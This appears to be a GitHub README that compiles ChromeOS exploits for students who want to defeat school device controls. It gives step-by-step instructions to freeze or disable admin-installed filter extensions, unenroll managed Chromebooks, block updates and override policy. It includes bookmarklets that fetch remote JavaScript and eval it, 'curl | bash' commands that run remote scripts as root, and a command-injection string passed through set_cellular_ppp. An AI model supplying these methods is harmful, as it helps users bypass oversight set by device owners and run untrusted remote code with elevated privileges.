Skip to content

SIMONHSCH/Exploits-And-Hacks

 
 

Repository files navigation

Exploits And Hacks

This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destory your computer if used inproperly. So PLEASE PLEASE make sure you follow these instructions very carefully! If you need help ask it here

Note: Students to see the list of more exploits click on JPCMG [LTBEEF with Service workers and scroll down than click TerraOS and scroll down. Only if you are on my github.io website.

ATTENTION ALL SYS ADMINS!!!

Hello, I am Brandon and I forked this repo from 3kh0 in order to give updated and old exploits for the masses and to prove one thing, chromebooks are literal trash, and a poor excuse for a computer. They are full of exploits, you might think you blocked/patched them all but then 3 more pop up. It is a endless game of whack-a-mole. Treat your students to a windows computer, they will thank you. And don't you dare start to think "My school district does not have that kind of money", it most likely does! How much are you paying the blocker companies? Think about that.

Image Credit: LittleMissNyan
LTMEAT Freeze extensions

DO NOT UPDATE YOUR CHROMEBOOK TO CHROME VERSION 115 OR ABOVE

Patched On Chrome Versions 115 And above

Literally The Meatiest Exploit of All Time

From ltmeat.bypassi.com, if you are intrested in how this exploit works, check out that website.

  1. Find a page belonging to the extension you want to disable. chrome://extensions, chrome://extensions-internals, and chrome://process-internals are all good places to find your extension's ID (a 32-character lowercase string). You can also just do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:
chrome-extension://extensionidhere/manifest.json

For some filters like Securly, the block screen is already an extension page.

  1. Bookmark the extension page (bookmark A) if you wish. Then, bookmark chrome://kill (B) and chrome://hang (C).
  2. While on the extension page (A), click the chrome://kill bookmark (B). The page should crash. You should already have the next step prepared.
  3. Instantly start spamming chrome://hang (bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard or ctrl+R). You should have reloaded within one or two seconds of killing the page.

If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs and the extension will basically be dead. If nothing loads, then you probably reloaded too late or spammed too slow. This isn't rocket science! Restart your computer to revert back to normal.

Exploit made by Bypassi#7037, further reading

"Help me! I'm an idiot!"

Turns out that I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions.

How do I get an extension ID?

Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.

It says blocked by client?

That's the message you get when you try to visit an a page belonging to an extension that doesn't exist. The error message (ERR_BLOCKED_BY_CLIENT) is extremely misleading. Nobody blocked it--you just need to find the right extension ID (see above).

If you got this because you tried to visit the extension_id_here_please example URL, you should be extremely ashamed of yourself. Please change and grow as a person.

I don't have a bookmarks bar!!!!

First, try running ctrl+shift+B. If that doesn't work, go to chrome://settings and turn on the "home button" feature, then set it to chrome://hang. A home icon should show up to the right of your refresh icon in the top left. Use that instead of bookmark C.

There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.

I disabled an extension but now I can't load websites!

If you actually just read the writeup, you'd know that this would happen if the extension's background page loaded and its listeners were already initialized before you used chrome://hang. You can double-check whether the extension is listening using chrome://extensions-internals, assuming you have a few brain cells in your head.

Anyway, no listeners means you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you weren't spamming bookmark C fast enough. The most reliable fix for this is to just restart your computer and try again. Try to match the pace of the gif below: (note the reload)

image

The bookmarks don't do anything when I click them!

Might be admin-blocked. Either be smart enough to figure out another way, or check this site daily to see if new alternate instructions have been posted.

I disabled the extension, why is some stuff still blocked?

I have bad news for you... not all filters are Chrome Extensions. And again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.

Need more help? Ask in the discussions

Baby LTMEAT Freeze extensions

Patched On Chrome Versions 115 And Above

BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGES.

  1. Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.

  2. Visit that chrome-extension://blockeridhere page, then type chrome://hang in the URL bar of that tab. It should start loading infinitely.

  3. Right-click the tab and duplicate it. Don't close anything.

  4. Go to the chrome://extensions page for the blocker extension you want to Disable.

  5. If that page has any sort of switch, such as "Allow access to file URLs", click that switch. If there are no clickable switches, cry in a corner or something.

The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.

LTMEAT Flood Freeze extensions

If your Chromebook has received the 115 And Above patch on the stable channel Then Here's A New Method For LTMEAT

Unpatched on 115 and above

Literally The Meatiest Exploit of All Time

  1. Create a bookmark folder and paste the extension page lots of times. (About 800 minimum is recommended assuming your Chromebook is average school quality) It is recommended that you add the extension page at the beginning of the folder.

  2. Right click and open all in a new window.

  3. Close the window with all those tabs.

  4. Open the folder in a new window again, and Chrome should hang those tabs to take care of the old ones in the background that were just closed. (Equivalent to the duplicate tab step in Bypassi's method)

  5. Flip the Allow access to file URLs switch in the extension settings and then you've bypassed the patch and the exploit is working.

  6. Close everything and you're good to go. If it didn't work, try adjusting the number of open tabs. This is the LTMEAT Flood Method, and also unofficially called Alternate Method # 2. Enjoy a much longer life of LTMEAT!

Not working? Ensure you open a large set, but not too large, of extension tabs (_/generated_background_page.html or /manifest.json) for a permanent freeze.

Credit to Ashton Davies for finding this workaround

Baby LTMEAT Flood Freeze extensions

Unpatched on 115 and above

  1. First of all, get your folder with 800+ extension page tabs and open it in a new window, for my Chromebook i used 800 extension page tabs as i feel it's the right amount for me

  2. Close the newly opened Window with 800+ extension page tabs

  3. Click into your folder, and open one of the extension page tab in a new window, maybe waiting slightly longer this time, to confirm it worked. If it loads, you did it wrong. If you see a "page unresponsive screen, and a wait/exit page button" you did it right" But don't click either of the buttons. (if you want to do it fast you can just see that the page always has a spinning loading circle)

  4. Now go to chrome://extensions/?id=yourblockerID Then scroll down and flick the "allow access to file URLs" lever and close the window with the 1 extension page tab remaining.

LTVegan Freeze extensions
  1. find the biggest file for your blocker extension

  2. open chrome://extensions/?id=IDHERE

  3. CTRL+A to copy all of the code, then drag the copied text to the tabs bar. this may freeze your chromebook a few times.

  4. start clicking the chrome extension tab (chrome://extensions/?id=IDHERE ) a few times, then wait ( chromebook is currently frozen).

  5. when your chromebook isn’t as frozen, right click the main.js tab and duplicate it.

  6. click the “Allow access to file URLs” (multiple times for good measure) and the first tab should close itself. if BOTH tabs closed themselves, you did something wrong, or just try again.

  7. you should be able to normally use your Chromebook now. afaik you might be able to close the duplicated tab but I didn’t close it and it lasted for a long time.

Anesthesia Freeze extensions with printing
  1. Find your extension's largest file. This can usually be found by poking around in your extension's manifest.json or you can use Rob Wu's crxviewer to find your extensions largest file.

  2. Go to that page. and hit Ctrl+P. A print window shoudl show up, with a number of pages in the top right.

  3. Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you can get that number, the longer the effect will last.

4 Hit reload. The page should start hanging.

  1. Go to your extension's settings page. This is in chrome://extensions.

  2. Duplicate your "printing" tab, and go back to your extension's settings page.

  3. Flip any switch you can find there. Usually there'll be one titled "Allow Access to File:// [URL]s".

  4. Presto! Go have fun on the (probably) unblocked web.

FAQ: Where do I find my extension's manifest.json? First find your extension's ID. This is a 32-character code that can be found in your extension's settings page, normally near or at the top. Then go to chrome-extension://your-32-char-id-goes-here/manifest.json

Credit to Bypassi for the original LTMEAT framework, and HUGE thanks to Swordmaster4321 for discovering that pages can be hanged with printing.

LoMoH Disable extensions

This exploit has been patched in Chrome OS 111 after being found and reported. It should have gotten admin protection sooner.

About: LoMoH is a Chromebook exploit that uses the Chrome OS locked mode feature to soft disable enforced extensions (excluding Hapara Highlights if installed).

HTML VERSION: LoMoH HTML

BOOKMARKLET VERSION: javascript:(function(){if (location.hostname == "docs.google.com") {document.body.innerHTML = document.body.innerHTML.replace("Locked mode is on", "Are you ready to turn off extensions?%22);%20document.body.innerHTML%20=%20document.body.innerHTML.replace(%22You%20have%20already%20opened%20and%20closed%20this%20quiz.%20Opening%20this%20quiz%20again%20will%20notify%20the%20form%20owner%20by%20email.%22,%20%22This%20will%20reload%20all%20tabs%20in%20your%20browser%22);%20var%20button%20=%20document.getElementById(%27mG61Hd%27);%20button.innerHTML%20=%20button.innerHTML.replace(%22Start%20Quiz%22,%20%22Disable%20Extensions%22);%20button.addEventListener(%27click%27,%20function(event){window.close();})}%20else%20{window.open(%22https://docs.google.com/forms/u/0/d/e/1FAIpQLSf5EYwrSUjmQhBOasMpORZy80eBCYb7qCpEwWNoRPUGyObGMA/startquiz%22);}})()

Credit to Ashton Davies for finding this exploit

Dextensify Freeze extensions

Dextensify is an exploit which lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.

Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html

Credit to ading2210 for finding/Making this exploit

JPCMG LTBEEF with Service workers

Requirements

  • Access to chrome://serviceworker-internals
  • Inspect element
  1. Go to chrome://serviceworker-internals
  2. Find your extension, this wont work if theres not a plugin in there.
  3. Hit the start button then the inspect button, run basic LTBEEF code
chrome.management.setEnabled('<plugin id here>',false)
  1. Profit

image

Thanks to Nyaann#3881 for this exploit

Corkey Corrupt extensions

Corkey does indeed include power washing the Chromebook, which wipes local data including everything under "My files," so I suggest you select everything you want to drag and back up to Google Drive if that's available for your account.

Chromebooks Only

  1. Esc+Refresh+Power and re-enroll (Enter recovery page) or you can just powerwash

  2. log into your chromebook and immediately turn off wifi and do refresh+power to (instant restart)

  3. Log back into your chromebook with the wifi off. There should be something on the side of the connect wifi page that says log in offline or sign in as a existing user.

  4. Go to chrome://extensions, turn on wifi, and wait for your schools blocking extension to appear.

  5. As soon as it appears turn off wifi and instant restart as fast as you can.

  6. Log back in and go back to extensions and wait. If it says your blocking extension could be corrupted or doesnt appear at all then it worked (wait atleast a minute with a close watch incase it comes back)

  7. If it didnt work repeat from step 1.

  8. If it did work you could go onto anything

CorkGuardian Freeze goguardian

You have to have the toggle in toolbar option on for goguardian in the chrome://extensions tab.

  1. Turn off Wi-Fi

  2. Sign out

  3. sign back in

  4. open a browser without restoring your tabs

  5. rapidly click on the GoGuardian extension until it turns dark grey

  6. Turn wifi back on

  7. Have fun browsing anything you want

Note: this only bypasses GoGuardian, any other blockers (like LightSpeed) or network blocks aren't bypassed. This works on atleast 122 Signing out again will remove the blocks, and you have to do the process again.

Extension Launcher Install extensions w/o allowlist A bookmarklet capable of installing extensions, for those without a allowlist.

Steps:

  1. Go to here bookmark the code there (Might make a dns)

  2. go to chrome.google.com/webstorex and use the bookmarklet, then put the icon of the extension, the id, and name of it (Doesn't matter just put anything)

  3. press download, and it will work.

Extra Notes

  • Credit to "Aka, but nice" on discord.
  • Dns will be up soon, if bookmarklets are blocked
  • This will not work if you have a blocklist this is only for if when you go to the webstore it shows blocked
Point-Blank Scripts on extension pages

This exploit allows you to run scripts, on extensions pages, this is a great example of how Chromebooks are a piece of garbage.

Getting started (Note: if bookmarklets are blocked your screwed.)

  1. Go to here if blocked on your school chromebook.

  2. Make a bookmark with the code there.

  3. Once that is done,

If you have Securly go to here if it says blocked by chrome, reload (you have to actually have securly ofc)

If you have iBoss go to here.

If you have Cisco Umbrella go to here.

If you have Blocksi go to here.

And if you have GoGuardian(might not work) go to here.

Now most of these links are a block page(this is intentional) on each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made and click either hard disable or soft disable, you can also run some of the scripts and run your own code, your extension may disable javascript being ran on it, so running your own code may not work.

Extra notes

  • I recommend doing soft disable, which only disables it until restart.
  • The launcher was made by 3kh0, but the idea was from Bypassi#7037
  • If your school updated GoGuardian, this exploit may not work.
UBoss Tamper with IBoss

By the BlueHatCrew https://dsc.gg/blue-hat-crew

This works only for iBoss, and Blocksi, If you don't have one of these, use Blank3r or Point Blank.

  1. Go to https://tinyurl.com/byeswamp if you have iBoss or https://tinyurl.com/blockboss if you have Blocksi. Then bookmark the code below
javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
  1. Then go to the site with your blocker that was listed above.
  2. Run the code. Follow the instructions there.

If it doesnt work let us know by creating a discussion, this was made in partnership with Aka, but nice#5094 and Bypassi#7037.

A Bypass For IBoss Unblock websites that are blocked by IBoss
  1. Firstly go over to your unblocked website you want to access.

  2. After visiting the website it should be blocked.

  3. You want to turn off your wifi, then spamclick the blocked link (not the url)

  4. Then after spamclicking, turn on your wifi.

  5. It should redirect you to "your connections been dissrupted" press reload.

  6. Then you should be at the blocked website completely unblocked!!

(NOTE: THIS ONLY WORKS ON SOME WEBSITES)

CAUB Prevent Updates

This exploit keeps your chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your chromebook that the wifi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.

image

Getting started

  1. Go to chrome://network#state (on your school chromebook of course; if this is blocked then ur kinda screwed lol).
  2. Scroll to the bottom of the page; you should see a list of "favorite" wifis that you've connected to in the past.
  3. Click the + sign next to the wifi name of each network that you commonly connect your chromebook to.
  4. The more wifis you expand, the better, but note that they have to come from the "favorites" section.
  5. Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
  6. Go to caub.glitch.me.
  7. Paste the copied text into the textbox bshelow.
  8. Press the generate onc button below the textbox.
  9. Once you have downloaded the file, go to chrome://network#general.
  10. Click on the import onc button.
  11. Import the newly downloaded file.

Extra notes

  • Your chromebook will no longer automatically update. (as long as you are on a wifi that you used caub on)
  • Be careful not to stay on a wifi for too long without using caub on it, otherwise you might update.
  • We cannot guarantee that this will work on every wifi
CAUB Via Flags Prevent Updates

This alt exploit keeps your chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a chrome flag, you can convince your chromebook not to automatic update.

Requirements

  • Access to chrome://flags

Getting started

  1. Go to chrome://flags#show-metered-toggle or search "metered" in chrome://flags instead.

  2. Enable it and restart your device.

  3. Open the Settings app.

  4. Go to your Network >> Advanced >> Show metered toggle and turn it on

Extra notes

  • Your chromebook will no longer automatically update. (as long as you have the flag enabled)
  • And you must be able to enable flags if it ain't blocked otherwise this exploit won't work
LTBEEF Disable extensions

LTBEEF is an exploit, created by Bypassi#7037, which abuses api endpoints within the google chrome webstore. The original site created for this exploit can be found at ltbeef.netlify.app

Please Note: This exploit only works on versions below 106, and eariler versions of 102

Installation
There are several vesions of this exploit you can use, here are the 2 most common versions:

  • Bookmarklets

    1. To use a GUI, bookmark one of the below scripts:
    • Ingot
    javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
    • Compact Cow's UI
    javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
    • Compact Cow's UI (Dark)
    javascript:void fetch(`https://raw.githubusercontent.com/3kh0/ext-remover/main/exploit.js`).then(d=>d.text()).then(eval);
    1. Navigate to https://chrome.google.com/webstorex and click on that bookmark.
    2. Flip the switches on the extentions you want to disable. Simple!

    Photos of the GUI's: image image

  • DNS servers
    By changing your DNS server, you can use LTBEEF, even if bookmarklets are blocked.

    1. First, go to Settings > Network > Wifi > Network.
    2. Click on Custom Name Servers

    image

    1. Set every box there to the following ip:
    158.101.114.159
    

    (Hosted by The Greatest Giant#0110)
    4. Navigate to https://chrome.google.com/webstorex and click on that bookmark. 5. Flip the switches on the extentions you want to disable. 6. Profit

LTBEEF inspect Using inspect to disable extensions

image

The screenshot below was preformed on 108.0.5359.75 (Official Build) (64-bit) on the stable channel. This has been tested and does work but has varying levels of success, you will need access to inspect element, more specifically, console.

  1. Open this on your chromebook:
chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json

Shortened link: https://tinyurl.com/i-ltbeef 2. Open inspect and navigate to the console tab. 3. Run the basic LTBEEF code such as

chrome.management.setEnabled('extensionid', false)

Replacing extensionid with the ID of the extension you want to disable, e.g. the stuff after the = in the URL bar when you click the extension's "details" button in chrome://extensions

Credit to SprinkzMC#8421 (aka Bypassi) for finding this!

image

To re-enable just go to the chrome web listing for the extension and click on the banner.

Blank3r Reload extensions continuously

Point Blank is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.

You can either use the prompt or the gui the prompt is below

  1. Bookmark this code:
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);

And the gui is in launcher.js

  1. Navigate to chrome://extensions.

  2. Click on a extension that YOU installed from the Chrome Web Store > Details.

  3. In the URL bar, copy the string of letters and numbers after the /?id=.

  4. Click "View in Chrome Web Store" and spam the excape key. If it loads into chrome webstore try again, if it is a blank screen click the bookmarklet.

  5. Paste the id of the extension into the prompt or input box seperated by commas.

If you close the tab, the exploit will stop working.

CryptoSmite Unenrollment

CryptoSmite is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on March 9th, 2024.

This exploit has been patched since Chrome OS 120.

Finding Kernver

If you're on v120 or higher, you need to downgrade in order to use CryptoSmite. To do this, you first need to check your kernver= in Recovery Mode.

  1. Boot into Recovery Mode
    • Hold ESC + Refresh + Power for 2 or 3 seconds.
    • You should be on an "Insert Recovery Media" or "Let's step you through the recovery process" screen.
  2. Press TAB and look at the last digit of the kernver= line
  • kernver= ends with a 2!
    Congratulations, you can downgrade to v119 or lower! Follow the instructions at Downgrading Change versions on how to downgrade.

  • kernver= ends with a 3!
    Sorry, you can't downgrade to v119 or lower. Wait for a new unenrollment exploit or do a dangerous hardware modification.

Using CryptoSmite

  1. Download a SH1MMER Prebuilt image here: https://dl.darkn.bio/SH1mmer/Prebuilt/
  2. Disable OS verification (blocked or not, doesn't matter), and boot into the shim.
  3. Navigate to Payloads and navigate to CryptoSmite using the arrow keys, then press Enter.
  4. Type in Y then press enter, and it'll automatically reboot upon completion.
  5. Proceed through the setup partially till you get to the Add Account Screen.
    • If you see an update prompt, reboot then press CTRL + ALT + E on the Wi-Fi screen.
      • This should allow skipping the update, or make it not appear at all.
  6. Powerwash the Chromebook at the "Add Account" screen. Afterwards, it'll be fully unenrolled.

Further Reading

SH1mmer Unenrollment sh1mmer is an exploit developed by the crew at Mercury Workshop. Credits can be found within the menu and on their site.

Further information is now located at these links:

Official Repository

Official Website (INSTRUCTIONS)

Raw Shims Download

SH1mmer V111 → V113 Unenrollment How to use SH1MMER on v111 → v113 (if you're willing to take the back cover off your Chromebook)

you'll only need to do this once, and it will let you use SH1MMER even after it's been completely patched

    1. Unplug everything, open the back panel, disconnect the battery to disable WP, plug in the charger
    2. boot into SH1MMER and use "Un-Enroll / Deprovision" (yes I know it will show an error, but that doesn't
    matter)
    (you will also need to run "Disable block_devmode" if you're using the old legacy version)
    3. go to the bash shell and run this command:
    /usr/share/vboot/bin/set_gbb_flags.sh 0x8090
    do not use "Reset GBB Flags" after this

    4. exit SH1MMER, unplug everything, reconnect the battery, reconnect the charger
    5. boot up, press CTRL + D to enter developer mode
    6. once it completes, use CTRL + ALT + SHIFT + R to powerwash
    7. after powerwash, immediately go into VT2 by pressing CTRL + ALT + F2 (→), login as "root" and run these commands:
    tpm_manager_client take_ownership
    cryptohome --action=remove_firmware_management_parameters
    if it fails, try downgrading to v110 if possible. if you can't, use E-Halycon instead.
    8. press CTRL + ALT + F1 (←), use CTRL + ALT + SHIFT + R to powerwash again
    9. profit

    NOTE: if you're on dedede, your WP method is probably different. look your model up online to find the WP
    method.
E-Halcyon Unenrollment Or Downgrade

First of all, you'll need a linux PC or VM. WSL is not guaranteed to work

Now, you'll need to boot into SH1MMER, and press the Un-Enroll option. It won't truly unenroll you if you've received the 112 update patching unenrollment and downgrading, but it is still a necessary step for the rest of this. If you've never used SH1MMER before or don't have an image lying around, make sure to follow all the instructions on sh1mmer.me for unenrollment before proceeding with the rest of the tutorial here

Next, you need a version 107 recovery image corresponding to your board, which you can pick up from chrome100.dev. Once you've downloaded the right image for your board and have confirmed it's for version 107, unzip it and save it to a safe place. Now open up a terminal and type in the following commands (make sure to replace /path/to/recovery/image.bin with the actual path)

git clone https://github.com/MercuryWorkshop/RecoMod
cd RecoMod
chmod +x recomod.sh
sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy

The script will modify the image in place, and it can now be flashed with a standard recovery tool onto a USB of your choice.

Enable developer mode and get to the dev mode block screen similarly to how you would with SH1MMER, then plug in the USB. The recovery screen will show up, and at this point you need to start spamming the E key on your keyboard. It will begin a 5 minute wait sequence, and near the end of the 5 minutes start spamming E again. You will only have to wait 5 minutes once, subsequent boots will have the 5 minute wait omitted

The boot splash will show, and you will enter a special menu. Use arrow keys to navigate the cursor down to "activate halcyon environment" and press enter. Then navigate down to "Install halcyon semi-tethered" and wait for it to finish. Once it's finished, go back to "activate halcyon environment" and press "Boot halcyon semi-tethered". and you will be booted into a downgraded and unenrolled ChromeOS environment.

FAQ: How does this work? See the writeup for more information

Can the admins see that I'm doing this? No.

Why don't my history/cookies/etc save after a reboot? Unfixable restriction of cryptohome. See the writeup for more information

Why is my Chromebook "Missing or damaged?" After installing E-Halcyon, you won't be able to boot Chrome OS normally. You'll have to keep the usb around to jumpstart the booting process

Where do I report bugs? The RecoMod GitHub

Why does it say "E mode not activated" when I try to boot halcyon? You spammed the E key when starting at the wrong time, or not at all

Credits: CoolElectronics - RecoMod, working switch_root, and everything else OlyB - Insight and contributions to the RecoMod script vk6 - Created this website

Old Weird Unenrollment Unenrollment

if you have a chromebook that's on a version below 101
(check chrome://version to see) press ctrl+alt+t and type this in

set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'

       then powerwash and it will unenroll           
                   cool right                        

to re-enroll, open a bash shell and type these in one by one
sudo -i
vpd -i RW_VPD -s check_enrollment=1
echo "fast safe" > /mnt/stateful_partition/factory_install_reset
reboot
TerraOS Linux from RMA shim
  1. Clone the TerraOS repository.

Run git clone https://github.com/r58Playz/terraos.git in a terminal.

  1. Create a build directory in the cloned directory.

  2. Run bash ../scripts/build_stage1.sh <defconfig> in the terminal.

  • Use terraos as the defconfig if building for x86_64 Chromebooks.
  • Use terraos_jacuzzi as the defconfig if building for jacuzzi board Chromebooks.
  • Support for jacuzzi boards is experimental and may not work.
  1. Run bash ../scripts/build_aur_packages.sh in the terminal.

  2. Run bash ../scripts/build_all.sh <shim.bin> <board_recovery.bin> <reven_recovery.bin> in the terminal, replacing <shim.bin> with the path to a shim for your board, <board_recovery.bin> with the path to a recovery image for your board, and <reven_recovery.bin> with the path to a Chrome OS Flex recovery of the same version. This places a built bootloader image, SquashFS and tarballs of the arch RootFS, a bootloader image with the arch Rootfs, a bootloader image with TerraOS Chrome OS, and a bootloader image with both the arch RootFS and TerraOS Chrome OS in the build directory.

The default arch RootFS user and password are terraos.

Shimboot Linux from RMA shim

Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.

For more detailed information, please see the project's README

Further reading:

Credit to vk6 for this exploit

Skiovox Unrestricted browsing

Patched on chrome versons 120+

What is it?

An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.

  • Skiovox utilizes a bug in kiosk apps
  • Very similar to a bug from 3 years ago Within the unblocked browser, you can
  • Install extensions
  • Bypass pretty much all blocks
  • Do whatever the honk you want

How to use it

Bypassi made a wonderful slideshow for you goof balls to follow, view using any of the links below!

Skiovox for v120 Unrestricted browsing

Skiovox Method "120"

"If you see that you don't have a sign in as existing user button, click Ctrl+Alt+Shift+R then click cancel" then continue.

  1. Sign out of your chromebook.

  2. Turn off your wifi.

  3. Select one of the apps

  4. As soon as you click on the app, quickly hit Alt+Shift+S.

  5. This should to launch the toolbar; watch for the "No wifi" screen to appear.

  6. After you click the settings on the screen brightness settings in the tool bar, nothing should happen (the tool bar will disappear), and that's normal.

  7. Press Ctrl+alt+z to open Chrome Vox, then select Resources, then select a link. Now use the exact keybindings to close Chrome Vox.

  8. Entering your password and school account, after click "Sign in as existing user." (Same login for school.) If everything went well, you should notice "muti user sign in disabled on this Chromebook" and be logged into your school account in the kiosk app. To bypass simply press the ESC button.

  9. You should be able to exit the browser associated with your school account and see a settings option; try turning on wifi first, then close that window. The window unblocked is the last one. You can launch incognito as well.

Skiovox for v121 Unrestricted browsing

Skiovox Method "121"

  1. signout

  2. type your password in (dont enter)

  3. click esc + shift + alt + r

  4. click "cancel" (dont powerwash your chromebook)

  5. do the normal skiovox thingy (ex: turning off wifi, going into the kiosk app, and alt + shift + s'ing then finally going to accessibility and question mark) -- these next steps have to be fast

  6. click "add wifi" then spam esc

  7. click add other person and spam esc

Only works if you have your gmail saved into your chromebook like those who have their gmail saved in their chromebook, so like when you sign out, your pfp would be there and you would only need to type your password basically if it shows usernames and photos on the sign-in screen is enabled by admin.

Tr3nch Running scripts in chrome://os-settings with SKIOVOX and Sh0vel

Website

GitHub

Discord

Source

Fakemurk Trick your Chromebook into being in developer mode while being enrolled in your school's profile

Fakemurk is a script that is able to run in developer mode to trick your Chromebook into being in developer mode while being enrolled in your school's profile. You can use this to disable any extension, as well as have full access to the chrome web store and google play store. This basically provides a personal Chromebook-like experience, while still being enrolled.

Go here and follow instructions: Fakemurk Doc

Pollen Chrome OS User Policy Editor

DEV MODE ONLY

Normal Use open crosh

run shell
run sudo su
run
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash

then press alt+vol_up+x

to make your own modifactions refer to the Pollen Wiki

Pollen Modifaction Wiki

Customized Pollen Chrome OS Policy Editor Customized

Customized Pollen for SH1mmered chrombook users.

The original pollen by Mercury Workshop: Pollen GitHub

It removes all admin installed extensions and thats kinda a problem for everyone so fruvs (op) edited it to make it fit more for SH1mmer users because fruvs (op) already got caught once cause he got snitched on.

So fruvs (op) customized this one to edit lots of features. But to keep all admin installed extensions so no one get's caught. So fruvs (op) edited some

incognito mode: on (everything unblocked, idk if extensions like GoGauridan can see)

ExtensionSettings: all settings removed

HomepageLocation: chrome://newtab

NewTabPageLocation: (left empty)

ManagedBookmarks: removed all school added bookmarks

PinnedLauncherApps: removed all force pinned apps to home bar

RestoreOnStartupURLs: (set it so when you open a new window some schools forces it to also open the schools homepage so its set back to new tab and no extra tabs)

WebAppInstallForceList: removed all force installed apps

How to run

Note: Devmode NEEDS to be enabled. Open Crosh

Run

shell

Run

sudo su

Run

curl -Ls https://tinyurl.com/repollen | bash

Done! It may take a few seconds for the new policy to apply. If it does not apply, press

alt+vol_up+x

Errors

If you have Linux enabled you will have to turn it off and turn it back on for it to work

THIS WILL RESET EVERY TIME YOU RESTART THE CHROMEBOOK SO YOU WILL NEED TO RE DO THE PROCESS

Fusion 360 exploit Unblocked browser

Some schools have Fusion360 already downloaded and if it isn’t, then download it through the play store. This exploit opens an unblocked browser inside of Fusion.

What you do is on the sign-up page, click terms of service. Then there is a YT logo at the bottom. Click it to go to the social media page. Next, click Autodesk under the YouTube text. Using this method, you get unblocked YT! For unblocked google, just look up “google.com link is description”. Go to the description and click google.com. Done!

The admin can remove apps, so it can still be blocked.

Downgrading Change versions Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, sutch as LTBEEF. This is a built in feature of ChromeOS.

image

Requirements

  1. A USB thumb drive with at least 4gb of storage, some board have small or bigger images, I recommend 16gb
  2. A personal computer with access to downloading extentions
  3. A brain If you do not have these, you CAN NOT perform the exploit!

Setup

  1. Navigate to chrome://version on the chromebook you with to downgrade and check for your board under Platform (ex I have a c3100 and it's board is stable-channel octopus).
  1. Navigate to https://chrome100.dev/ , press ctrl+f and type in your board.
  2. Find and download the chrome version you want to your personal computer.

Instlation

  1. Install Chromebook Recovery Utility onto your personal computer. (found at chrome.google.com/webstore/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm
  2. Open the extention, and click on the settings button in to top right hand corner, and click "use local image".
  3. Select the recovery image you downloaded from chrome100.
  4. Plug in the USB you wish to use, and follow the prompts on the screen.
  5. On your chromebook, press esc+reload+power and follow the prompts.
  6. On the checking for updates screen, press ctrl+shift+e to skip the "checking for updates" screen.
  7. Profit.
Killcurly Break extensions Kill extension, by signing out.
  1. Visit chrome://settings/signOut, the O in Out must be capital.
  2. Press the big blue button
  3. Go to chrome://restart
  4. Now visit tinyurl.com/AddSession or this link
  5. Add your SCHOOL account back. It WILL NOT WORK if you add a home account back. This is just so you can still access Google Drive, Youtube, and any Google service.
  6. All extensions should stop working.
  7. Note that you have to repeat this every time you restart or sign out.
  8. If the link gets patched and you no longer see the blue button, go to chrome://settings/resetProfileSettings click current settings, it'll open a blank page, on that page run
javascript:opener.chrome.send("TurnOffSync");

And visit chrome://restart.

Workaround for chrome://settings/signOut and javascript:opener.chrome.send("TurnOffSync"); if both patched: Just go to chrome://settings/syncSetup/advanced and click Customize sync and then flip off the Extensions and Apps or just flip off everything exept for bookmarks

This was discovered by zoroark and Brandon421-ops

Extention Inactivity hack Inactive Extensions
  1. First do the Esc+Refresh+Power

  2. ctrl+d then enter

  3. will give you some bullcrap about dev mode is blocked press enter then you will go to a newly restarted chromebook

  4. next add wifi-

  5. then sign into your account

  6. Immediately turn wifi off before extensions load

  7. go to chrome://settings/signOut

  8. click turn off sync and personalization and then turn wifi back on go to whatever site that is extension blocked.

  9. Workaround for chrome://settings/signOut if patched: If the link gets patched and you no longer see the blue button, go to chrome://settings/resetProfileSettings click current settings, it'll open a blank page, on that page run

javascript:opener.chrome.send("TurnOffSync");
